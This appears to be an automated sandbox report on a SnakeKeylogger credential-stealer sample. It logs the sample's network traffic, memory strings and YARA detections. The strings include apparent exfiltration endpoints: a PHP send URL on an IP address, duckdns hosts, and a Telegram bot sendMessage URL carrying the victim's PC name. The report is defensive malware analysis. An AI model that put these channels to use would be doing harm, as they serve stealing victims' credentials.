Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49764 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49773 version: TLS 1.0
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic | DNS traffic detected: DNS query: mail.rasextraders.com
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.rasextraders.com
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0/
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://rasextraders.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1725042592.0000000003532000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1767372699.0000000002752000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.19.dr | String found in binary or memory: http://upx.sf.net
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731386438.000000000633C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.comR:
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20a
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79$
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.794
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
                Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443

                System Summary

                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
                Source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
